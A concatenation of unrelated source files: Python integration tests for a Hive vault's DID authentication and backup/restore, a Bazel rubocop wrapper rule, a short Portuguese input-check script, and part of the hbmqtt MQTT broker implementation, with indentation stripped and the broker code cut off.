# print(jwt)
jws = lib.DefaultJWSParser_Parse(jwt.encode())
# if not jws:
# print(ffi.string(lib.DIDError_GetLastErrorMessage()).decode())
aud = ffi.string(lib.JWT_GetAudience(jws)).decode()
self.assertEqual(aud, app_did.get_did_string())
nonce = ffi.string(lib.JWT_GetClaim(jws, "nonce".encode())).decode()
hive_did = ffi.string(lib.JWT_GetIssuer(jws)).decode()
lib.JWT_Destroy(jws)
# auth
vc = user_did.issue_auth(app_did)
vp_json = app_did.create_presentation(vc, nonce, hive_did)
auth_token = app_did.create_vp_token(vp_json, "DIDAuthResponse", hive_did, 60)
# print(auth_token)
logging.getLogger("test_auth_common").debug(f"\nauth_token: {auth_token}")
param = {
"jwt": auth_token,
}
r = requests.post(host + '/api/v1/did/auth',
json=param,
headers=self.json_header())
self.assert200(r.status_code)
rt = r.json()
token = rt["access_token"]
jws = lib.DefaultJWSParser_Parse(token.encode())
aud = ffi.string(lib.JWT_GetAudience(jws)).decode()
self.assertEqual(aud, app_did.get_did_string())
issuer = ffi.string(lib.JWT_GetIssuer(jws)).decode()
lib.JWT_Destroy(jws)
# print(token)
logging.getLogger("test_auth_common").debug(f"\ntoken: {token}")
app_did.set_access_token(token)
# auth_check
# token = test_common.get_auth_token()
r = requests.post(host + '/api/v1/did/check_token',
json=param,
headers=self.auth_header(token))
self.assert200(r.status_code)
return token, hive_did
def get_did_token(self, host):
token, hive_did = self.did_auth(host, self.user_did, self.user_app_did)
return token, hive_did
def init_vault_service(self, host, token):
param = {}
r = requests.post(host + '/api/v1/service/vault/create',
json=param,
headers={"Content-Type": "application/json", "Authorization": "token " + token})
self.assert200(r.status_code)
def init_backup_service(self, host, token):
param = {}
r = requests.post(host + '/api/v1/service/vault_backup/create',
json=param,
headers={"Content-Type": "application/json", "Authorization": "token " + token})
self.assert200(r.status_code)
def create_upload_file(self, host, token, file_name, data):
temp = BytesIO()
temp.write(data.encode(encoding="utf-8"))
temp.seek(0)
temp.name = 'temp.txt'
upload_file_url = "/api/v1/files/upload/" + file_name
r = requests.post(host + upload_file_url,
data=temp,
headers=self.upload_header(token))
self.assert200(r.status_code)
rt = r.json()
self.assertEqual(rt["_status"], "OK")
def upsert_collection(self, host, token, col_name, doc):
r = requests.post(host + '/api/v1/db/create_collection',
json={
"collection": col_name
},
headers=self.auth_header(token))
self.assert200(r.status_code)
r = requests.post(host + '/api/v1/db/insert_one',
json={
"collection": col_name,
"document": doc,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def add_vault_data(self, host, token):
doc = dict()
for i in range(1, 10):
doc["work" + str(i)] = "work_content" + str(i)
self.upsert_collection(host, token, "works", doc)
self.create_upload_file(host, token, "test0.txt", "this is a test 0 file")
self.create_upload_file(host, token, "f1/test1.txt", "this is a test 1 file")
self.create_upload_file(host, token, "f1/test1_2.txt", "this is a test 1_2 file")
self.create_upload_file(host, token, "f2/f1/test2.txt", "this is a test 2 file")
self.create_upload_file(host, token, "f2/f1/test2_2.txt", "this is a test 2_2 file")
def check_vault_data(self, host, token):
r = requests.post(host + '/api/v1/db/find_many',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
# print(r.json())
r1 = requests.get(host + '/api/v1/files/list/folder',
headers=self.auth_header(token))
self.assert200(r1.status_code)
# print(r1.json())
def clean_vault_data(self, host, token):
r = requests.post(host + '/api/v1/db/delete_collection',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
time.sleep(2)
r = requests.post(host + '/api/v1/db/find_many',
json={
"collection": "works"
},
headers=self.auth_header(token))
self.assertEqual(NOT_FOUND, r.status_code)
r = requests.post(host + '/api/v1/files/delete',
json={
"path": "/"
},
headers=self.auth_header(token))
self.assert200(r.status_code)
time.sleep(2)
r = requests.get(host + '/api/v1/files/list/folder', headers=self.auth_header(token))
self.assertEqual(NOT_FOUND, r.status_code)
def save_to_backup(self, host, token, vc_json):
r = requests.post(host + '/api/v1/backup/save_to_node',
json={
"backup_credential": vc_json,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
for i in range(0, 3):
r1 = requests.get(host + '/api/v1/backup/state',
headers=self.auth_header(token))
self.assert200(r1.status_code)
rt = r1.json()
if rt["hive_backup_state"] != "stop":
time.sleep(10)
else:
self.assertEqual(rt["result"], "success")
return
self.assertTrue(False)
def restore_from_backup(self, host, token, vc_json):
r = requests.post(host + '/api/v1/backup/restore_from_node',
json={
"backup_credential": vc_json,
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def active_backup_vault(self, host, token):
r = requests.post(host + '/api/v1/backup/activate_to_vault',
json={
},
headers=self.auth_header(token))
self.assert200(r.status_code)
def test_1_save_restore_hive_node(self):
self.init_vault_service(self.host1, self.token1)
self.add_vault_data(self.host1, self.token1)
self.check_vault_data(self.host1, self.token1)
self.init_backup_service(self.host2, self.token2)
vc = self.user_did.issue_backup_auth(self.hive_did1, self.host2, self.hive_did2)
vc_json = ffi.string(lib.Credential_ToString(vc, True)).decode()
self.save_to_backup(self.host1, self.token1, vc_json)
self.clean_vault_data(self.host1, self.token1)
self.restore_from_backup(self.host1, self.token1, vc_json)
time.sleep(2)
self.check_vault_data(self.host1, self.token1)
# active test
self.init_vault_service(self.host2, self.token2)
self.active_backup_vault(self.host2, self.token2)
self.check_vault_data(self.host2, self.token2)
def test_2_classify_restore_files_same(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_get_list, file_patch_list, file_delete_list = HiveBackup.classify_restore_files(saved_file_list,
local_file_list,
vault_folder)
self.assertFalse(file_get_list)
self.assertFalse(file_patch_list)
self.assertFalse(file_delete_list)
def test_2_classify_restore_files(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612xxx", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111xxx", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456114", "~/vault/dir/f1/f_1/f2/testfile_114"])
file_get_list, file_patch_list, file_delete_list = HiveBackup.classify_restore_files(saved_file_list,
local_file_list,
vault_folder)
file_get_list_compare = list()
file_get_list_compare.append(["testfile2", "~/vault/dir/testfile2"])
file_get_list_compare.append(["f1/f_1/f2/testfile_113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_patch_list_compare = list()
file_patch_list_compare.append(["f1/testfile_12", "~/vault/dir/f1/testfile_12"])
file_patch_list_compare.append(["f1/f_1/f2/testfile_111", "~/vault/dir/f1/f_1/f2/testfile_111"])
file_delete_list_compare = list()
file_delete_list_compare.append("~/vault/dir/f1/f_1/f2/testfile_114")
self.assertEquals(file_get_list, file_get_list_compare)
self.assertEquals(file_patch_list, file_patch_list_compare)
self.assertEquals(file_delete_list, file_delete_list_compare)
def test_3_classify_save_files_same(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_put_list, file_patch_list, file_delete_list = HiveBackup.classify_save_files(saved_file_list,
local_file_list,
vault_folder)
self.assertFalse(file_put_list)
self.assertFalse(file_patch_list)
self.assertFalse(file_delete_list)
def test_3_classify_save_files(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612x", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111x", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456114", "f1/f_1/f2/testfile_114"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_put_list, file_patch_list, file_delete_list = HiveBackup.classify_save_files(saved_file_list,
local_file_list,
vault_folder)
file_put_list_compare = list()
file_put_list_compare.append(["~/vault/dir/testfile2", "testfile2"])
file_put_list_compare.append(["~/vault/dir/f1/f_1/f2/testfile_113", "f1/f_1/f2/testfile_113"])
file_patch_list_compare = list()
file_patch_list_compare.append(["~/vault/dir/f1/testfile_12", "f1/testfile_12"])
file_patch_list_compare.append(["~/vault/dir/f1/f_1/f2/testfile_111", "f1/f_1/f2/testfile_111"])
file_delete_list_compare = list()
file_delete_list_compare.append("f1/f_1/f2/testfile_114")
self.assertEquals(file_put_list, file_put_list_compare)
self.assertEquals(file_patch_list, file_patch_list_compare)
self.assertEquals(file_delete_list, file_delete_list_compare)
def test_4_inter_put_file(self):
self.init_vault_service(self.host1, self.token1)
self.init_backup_service(self.host2, self.token2)
vc = self.user_did.issue_backup_auth(self.hive_did1, self.host2, self.hive_did2)
vc_json = ffi.string(lib.Credential_ToString(vc, True)).decode()
content = {"backup_credential": vc_json}
host, backup_token, err = view.h_auth.backup_auth_request(content)
self.assertIsNone(err)
input_text = "this is a test put file"
file_name = "test_put_file.txt"
temp = BytesIO()
temp.write(input_text.encode(encoding="utf-8"))
temp.seek(0)
temp.name = 'temp.txt'
url = self.host2 + INTER_BACKUP_FILE_URL + '?file=' + file_name
r = requests.put(url,
data=temp,
headers={"Authorization": "token " + backup_token})
self.assert200(r.status_code)
r = requests.get(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
stream=True,
headers={"Authorization": "token " + backup_token})
self.assertEquals(r.text, input_text)
r = requests.delete(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
headers={"Authorization": "token " + backup_token})
self.assert200(r.status_code)
r = requests.get(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
stream=True,
headers={"Authorization": "token " + backup_token})
self.assertEquals(r.status_code, NOT_FOUND)
|
load("@bazelruby_rules_ruby//ruby/private:binary.bzl", "ruby_binary")
# This wraps an rb_binary in a script that is executed from the workspace folder
def rubocop(name, bin, deps):
bin_name = name + "-ruby"
ruby_binary(
name = bin_name,
main = bin,
deps = deps,
)
runner = "@bazelruby_rules_ruby//ruby/private/rubocop:runner.sh.tpl"
native.genrule(
name = name,
tools = [bin_name],
srcs = [runner],
executable = True,
outs = [name + ".sh"],
cmd = "sed \"s~{{BIN}}~$(location %s)~g\" $(location %s) > \"$@\"" % (bin_name, runner),
)
|
n = input('Digite um Numero/Letra/Palavra ou uma pequena frase: ')
print(n.isnumeric())
print(n.isalpha())
|
# Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
import logging
import ssl
import websockets
import asyncio
import sys
import re
from asyncio import CancelledError
from collections import deque
from functools import partial
from transitions import Machine, MachineError
from hbmqtt.session import Session
from hbmqtt.mqtt.protocol.broker_handler import BrokerProtocolHandler
from hbmqtt.errors import HBMQTTException, MQTTException
from hbmqtt.utils import format_client_message, gen_client_id
from hbmqtt.adapters import (
StreamReaderAdapter,
StreamWriterAdapter,
ReaderAdapter,
WriterAdapter,
WebSocketsReader,
WebSocketsWriter)
from .plugins.manager import PluginManager, BaseContext
_defaults = {
'timeout-disconnect-delay': 2,
'auth': {
'allow-anonymous': True,
'password-file': None
},
}
EVENT_BROKER_PRE_START = 'broker_pre_start'
EVENT_BROKER_POST_START = 'broker_post_start'
EVENT_BROKER_PRE_SHUTDOWN = 'broker_pre_shutdown'
EVENT_BROKER_POST_SHUTDOWN = 'broker_post_shutdown'
EVENT_BROKER_CLIENT_CONNECTED = 'broker_client_connected'
EVENT_BROKER_CLIENT_DISCONNECTED = 'broker_client_disconnected'
EVENT_BROKER_CLIENT_SUBSCRIBED = 'broker_client_subscribed'
EVENT_BROKER_CLIENT_UNSUBSCRIBED = 'broker_client_unsubscribed'
EVENT_BROKER_MESSAGE_RECEIVED = 'broker_message_received'
class BrokerException(BaseException):
pass
class RetainedApplicationMessage:
__slots__ = ('source_session', 'topic', 'data', 'qos')
def __init__(self, source_session, topic, data, qos=None):
self.source_session = source_session
self.topic = topic
self.data = data
self.qos = qos
class Server:
def __init__(self, listener_name, server_instance, max_connections=-1, loop=None):
self.logger = logging.getLogger(__name__)
self.instance = server_instance
self.conn_count = 0
self.listener_name = listener_name
if loop is not None:
self._loop = loop
else:
self._loop = asyncio.get_event_loop()
self.max_connections = max_connections
if self.max_connections > 0:
self.semaphore = asyncio.Semaphore(self.max_connections, loop=self._loop)
else:
self.semaphore = None
@asyncio.coroutine
def acquire_connection(self):
if self.semaphore:
yield from self.semaphore.acquire()
self.conn_count += 1
if self.max_connections > 0:
self.logger.info("Listener '%s': %d/%d connections acquired" %
(self.listener_name, self.conn_count, self.max_connections))
else:
self.logger.info("Listener '%s': %d connections acquired" %
(self.listener_name, self.conn_count))
def release_connection(self):
if self.semaphore:
self.semaphore.release()
self.conn_count -= 1
if self.max_connections > 0:
self.logger.info("Listener '%s': %d/%d connections acquired" %
(self.listener_name, self.conn_count, self.max_connections))
else:
self.logger.info("Listener '%s': %d connections acquired" %
(self.listener_name, self.conn_count))
@asyncio.coroutine
def close_instance(self):
if self.instance:
self.instance.close()
yield from self.instance.wait_closed()
class BrokerContext(BaseContext):
"""
BrokerContext is used as the context passed to plugins interacting with the broker.
It act as an adapter to broker services from plugins developed for HBMQTT broker
"""
def __init__(self, broker):
super().__init__()
self.config = None
self._broker_instance = broker
@asyncio.coroutine
def broadcast_message(self, topic, data, qos=None):
yield from self._broker_instance.internal_message_broadcast(topic, data, qos)
def retain_message(self, topic_name, data, qos=None):
self._broker_instance.retain_message(None, topic_name, data, qos)
@property
def sessions(self):
for k, session in self._broker_instance._sessions.items():
yield session[0]
@property
def retained_messages(self):
return self._broker_instance._retained_messages
@property
def subscriptions(self):
return self._broker_instance._subscriptions
class Broker:
"""
MQTT 3.1.1 compliant broker implementation
:param config: Example Yaml config
:param loop: asyncio loop to use. Defaults to ``asyncio.get_event_loop()`` if none is given
:param plugin_namespace: Plugin namespace to use when loading plugin entry_points. Defaults to ``hbmqtt.broker.plugins``
"""
states = ['new', 'starting', 'started', 'not_started', 'stopping', 'stopped', 'not_stopped', 'stopped']
def __init__(self, config=None, loop=None, plugin_namespace=None):
self.logger = logging.getLogger(__name__)
self.config = _defaults
if config is not None:
self.config.update(config)
self._build_listeners_config(self.config)
if loop is not None:
self._loop = loop
else:
self._loop = asyncio.get_event_loop()
self._servers = dict()
self._init_states()
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self._broadcast_queue = asyncio.Queue(loop=self._loop)
self._broadcast_task = None
# Init plugins manager
context = BrokerContext(self)
context.config = self.config
if plugin_namespace:
namespace = plugin_namespace
else:
namespace = 'hbmqtt.broker.plugins'
self.plugins_manager = PluginManager(namespace, context, self._loop)
def _build_listeners_config(self, broker_config):
self.listeners_config = dict()
try:
listeners_config = broker_config['listeners']
defaults = listeners_config['default']
for listener in listeners_config:
config = dict(defaults)
config.update(listeners_config[listener])
self.listeners_config[listener] = config
except KeyError as ke:
raise BrokerException("Listener config not found invalid: %s" % ke)
def _init_states(self):
self.transitions = Machine(states=Broker.states, initial='new')
self.transitions.add_transition(trigger='start', source='new', dest='starting')
self.transitions.add_transition(trigger='starting_fail', source='starting', dest='not_started')
self.transitions.add_transition(trigger='starting_success', source='starting', dest='started')
self.transitions.add_transition(trigger='shutdown', source='started', dest='stopping')
self.transitions.add_transition(trigger='stopping_success', source='stopping', dest='stopped')
self.transitions.add_transition(trigger='stopping_failure', source='stopping', dest='not_stopped')
self.transitions.add_transition(trigger='start', source='stopped', dest='starting')
@asyncio.coroutine
def start(self):
"""
Start the broker to serve with the given configuration
Start method opens network sockets and will start listening for incoming connections.
This method is a *coroutine*.
"""
try:
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self.transitions.start()
self.logger.debug("Broker starting")
except (MachineError, ValueError) as exc:
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.warning("[WARN-0001] Invalid method call at this moment: %s" % exc)
raise BrokerException("Broker instance can't be started: %s" % exc)
yield from self.plugins_manager.fire_event(EVENT_BROKER_PRE_START)
try:
# Start network listeners
for listener_name in self.listeners_config:
listener = self.listeners_config[listener_name]
if 'bind' not in listener:
self.logger.debug("Listener configuration '%s' is not bound" % listener_name)
else:
# Max connections
try:
max_connections = listener['max_connections']
except KeyError:
max_connections = -1
# SSL Context
sc = None
# accept string "on" / "off" or boolean
ssl_active = listener.get('ssl', False)
if isinstance(ssl_active, str):
ssl_active = ssl_active.upper() == 'ON'
if ssl_active:
try:
sc = ssl.create_default_context(
ssl.Purpose.CLIENT_AUTH,
cafile=listener.get('cafile'),
capath=listener.get('capath'),
cadata=listener.get('cadata')
)
sc.load_cert_chain(listener['certfile'], listener['keyfile'])
sc.verify_mode = ssl.CERT_OPTIONAL
except KeyError as ke:
raise BrokerException("'certfile' or 'keyfile' configuration parameter missing: %s" % ke)
except FileNotFoundError as fnfe:
raise BrokerException("Can't read cert files '%s' or '%s' : %s" %
(listener['certfile'], listener['keyfile'], fnfe))
address, s_port = listener['bind'].split(':')
port = 0
try:
port = int(s_port)
except ValueError as ve:
raise BrokerException("Invalid port value in bind value: %s" % listener['bind'])
if listener['type'] == 'tcp':
cb_partial = partial(self.stream_connected, listener_name=listener_name)
instance = yield from asyncio.start_server(cb_partial,
address,
port,
ssl=sc,
loop=self._loop)
self._servers[listener_name] = Server(listener_name, instance, max_connections, self._loop)
elif listener['type'] == 'ws':
cb_partial = partial(self.ws_connected, listener_name=listener_name)
instance = yield from websockets.serve(cb_partial, address, port, ssl=sc, loop=self._loop,
subprotocols=['mqtt'])
self._servers[listener_name] = Server(listener_name, instance, max_connections, self._loop)
self.logger.info("Listener '%s' bind to %s (max_connections=%d)" %
(listener_name, listener['bind'], max_connections))
self.transitions.starting_success()
yield from self.plugins_manager.fire_event(EVENT_BROKER_POST_START)
#Start broadcast loop
self._broadcast_task = asyncio.ensure_future(self._broadcast_loop(), loop=self._loop)
self.logger.debug("Broker started")
except Exception as e:
self.logger.error("Broker startup failed: %s" % e)
self.transitions.starting_fail()
raise BrokerException("Broker instance can't be started: %s" % e)
@asyncio.coroutine
def shutdown(self):
"""
Stop broker instance.
Closes all connected session, stop listening on network socket and free resources.
"""
try:
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self.transitions.shutdown()
except (MachineError, ValueError) as exc:
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.debug("Invalid method call at this moment: %s" % exc)
raise BrokerException("Broker instance can't be stopped: %s" % exc)
# Fire broker_shutdown event to plugins
yield from self.plugins_manager.fire_event(EVENT_BROKER_PRE_SHUTDOWN)
# Stop broadcast loop
if self._broadcast_task:
self._broadcast_task.cancel()
if self._broadcast_queue.qsize() > 0:
self.logger.warning("%d messages not broadcasted" % self._broadcast_queue.qsize())
for listener_name in self._servers:
server = self._servers[listener_name]
yield from server.close_instance()
self.logger.debug("Broker closing")
self.logger.info("Broker closed")
yield from self.plugins_manager.fire_event(EVENT_BROKER_POST_SHUTDOWN)
self.transitions.stopping_success()
@asyncio.coroutine
def internal_message_broadcast(self, topic, data, qos=None):
return (yield from self._broadcast_message(None, topic, data))
@asyncio.coroutine
def ws_connected(self, websocket, uri, listener_name):
yield from self.client_connected(listener_name, WebSocketsReader(websocket), WebSocketsWriter(websocket))
@asyncio.coroutine
def stream_connected(self, reader, writer, listener_name):
yield from self.client_connected(listener_name, StreamReaderAdapter(reader), StreamWriterAdapter(writer))
@asyncio.coroutine
def client_connected(self, listener_name, reader: ReaderAdapter, writer: WriterAdapter):
# Wait for connection available on listener
server = self._servers.get(listener_name, None)
if not server:
raise BrokerException("Invalid listener name '%s'" % listener_name)
yield from server.acquire_connection()
remote_address, remote_port = writer.get_peer_info()
self.logger.info("Connection from %s:%d on listener '%s'" % (remote_address, remote_port, listener_name))
# Wait for first packet and expect a CONNECT
try:
handler, client_session = yield from BrokerProtocolHandler.init_from_connect(reader, writer, self.plugins_manager, loop=self._loop)
except HBMQTTException as exc:
self.logger.warning("[MQTT-3.1.0-1] %s: Can't read first packet an CONNECT: %s" %
(format_client_message(address=remote_address, port=remote_port), exc))
#yield from writer.close()
self.logger.debug("Connection closed")
return
except MQTTException as me:
self.logger.error('Invalid connection from %s : %s' %
(format_client_message(address=remote_address, port=remote_port), me))
yield from writer.close()
self.logger.debug("Connection closed")
return
if client_session.clean_session:
# Delete existing session and create a new one
if client_session.client_id is not None and client_session.client_id != "":
self.delete_session(client_session.client_id)
else:
client_session.client_id = gen_client_id()
client_session.parent = 0
else:
# Get session from cache
if client_session.client_id in self._sessions:
self.logger.debug("Found old session %s" % repr(self._sessions[client_session.client_id]))
(client_session, h) = self._sessions[client_session.client_id]
client_session.parent = 1
else:
client_session.parent = 0
if client_session.keep_alive > 0:
client_session.keep_alive += self.config['timeout-disconnect-delay']
self.logger.debug("Keep-alive timeout=%d" % client_session.keep_alive)
handler.attach(client_session, reader, writer)
self._sessions[client_session.client_id] = (client_session, handler)
authenticated = yield from self.authenticate(client_session, self.listeners_config[listener_name])
if not authenticated:
yield from writer.close()
server.release_connection() # Delete client from connections list
return
while True:
try:
client_session.transitions.connect()
break
except (MachineError, ValueError):
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.warning("Client %s is reconnecting too quickly, make it wait" % client_session.client_id)
# Wait a bit may be client is reconnecting too fast
yield from asyncio.sleep(1, loop=self._loop)
yield from handler.mqtt_connack_authorize(authenticated)
yield from self.plugins_manager.fire_event(EVENT_BROKER_CLIENT_CONNECTED, client_id=client_session.client_id)
self.logger.debug("%s Start messages handling" % client_session.client_id)
yield from handler.start()
self.logger.debug("Retained messages queue size: %d" % client_session.retained_messages.qsize())
yield from self.publish_session_retained_messages(client_session)
# Init and start loop for handling client messages (publish, subscribe/unsubscribe, disconnect)
disconnect_waiter = asyncio.ensure_future(handler.wait_disconnect(), loop=self._loop)
subscribe_waiter = asyncio.ensure_future(handler.get_next_pending_subscription(), loop=self._loop)
unsubscribe_waiter = asyncio.ensure_future(handler.get_next_pending_unsubscription(), loop=self._loop)
wait_deliver = asyncio.ensure_future(handler.mqtt_deliver_next_message(), loop=self._loop)
connected = True
while connected:
try:
done, pending = yield from asyncio.wait(
[disconnect_waiter, subscribe_waiter, unsubscribe_waiter, wait_deliver],
return_when=asyncio.FIRST_COMPLETED, loop=self._loop)
if disconnect_waiter in done:
result = disconnect_waiter.result()
self.logger.debug("%s Result from wait_diconnect: %s" % (client_session.client_id, result))
if result is None:
self.logger.debug("Will flag: %s" % client_session.will_flag)
# Connection closed anormally, send will message
if client_session.will_flag:
self.logger.debug("Client %s disconnected abnormally, sending will message" %
format_client_message(client_session))
yield from self._broadcast_message(
client_session,
client_session.will_topic,
client_session.will_message,
client_session.will_qos)
if client_session.will_retain:
self.retain_message(client_session,
client_session.will_topic,
client_session.will_message,
client_session.will_qos)
self.logger.debug("%s Disconnecting session" % client_session.client_id)
yield from self._stop_handler(handler)
client_session.transitions.disconnect()
yield from self.plugins_manager.fire_event(EVENT_BROKER_CLIENT_DISCONNECTED, client_id=client_session.client_id)
connected = False
if unsubscribe_waiter in done:
self.logger.debug("%s handling unsubscription" % client_session.client_id)
unsubscription = unsubscribe_waiter.result()
for topic in unsubscription['topics']:
self._del_subscription(topic, client_session)
yield from self.plugins_manager.fire_event(
EVENT_BROKER_CLIENT_UNSUBSCRIBED,
client_id=client_session.client_id,
topic=topic)
yield from handler.mqtt_acknowledge_unsubscription(unsubscription['packet_id'])
unsubscribe_waiter = asyncio.Task(handler.get_next_pending_unsubscription(), loop=self._loop)
if subscribe_waiter in done:
self.logger.debug("%s handling subscription" % client_session.client_id)
subscriptions = subscribe_waiter.result()
return_codes = []
for subscription in subscriptions['topics']:
result = yield from self.add_subscription(subscription, client_session)
return_codes.append(result)
yield from handler.mqtt_acknowledge_subscription(subscriptions['packet_id'], return_codes)
for index, subscription in enumerate(subscriptions['topics']):
if return_codes[index] != 0x80:
yield from self.plugins_manager.fire_event(
EVENT_BROKER_CLIENT_SUBSCRIBED,
client_id=client_session.client_id,
topic=subscription[0],
qos=subscription[1])
yield from self.publish_retained_messages_for_subscription(subscription, client_session)
subscribe_waiter = asyncio.Task(handler.get_next_pending_subscription(), loop=self._loop)
self.logger.debug(repr(self._subscriptions))
if wait_deliver in done:
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug("%s handling message delivery" % client_session.client_id)
app_message = wait_deliver.result()
if not app_message.topic:
self.logger.warning("[MQTT-4.7.3-1] - %s invalid TOPIC sent in PUBLISH message, closing connection" % client_session.client_id)
break
if "#" in app_message.topic or "+" in app_message.topic:
self.logger.warning("[MQTT-3.3.2-2] - %s invalid TOPIC sent in PUBLISH message, closing connection" % client_session.client_id)
break
yield from self.plugins_manager.fire_event(EVENT_BROKER_MESSAGE_RECEIVED,
client_id=client_session.client_id,
message=app_message)
yield from self._broadcast_message(client_session, app_message.topic, app_message.data)
if app_message.publish_packet.retain_flag:
self.retain_message(client_session, app_message.topic, app_message.data, app_message.qos)
wait_deliver = asyncio.Task(handler.mqtt_deliver_next_message(), loop=self._loop)
except asyncio.CancelledError:
self.logger.debug("Client loop cancelled")
break
disconnect_waiter.cancel()
subscribe_waiter.cancel()
unsubscribe_waiter.cancel()
wait_deliver.cancel()
self.logger.debug("%s Client disconnected" % client_session.client_id)
server.release_connection()
def _init_handler(self, session, reader, writer):
"""
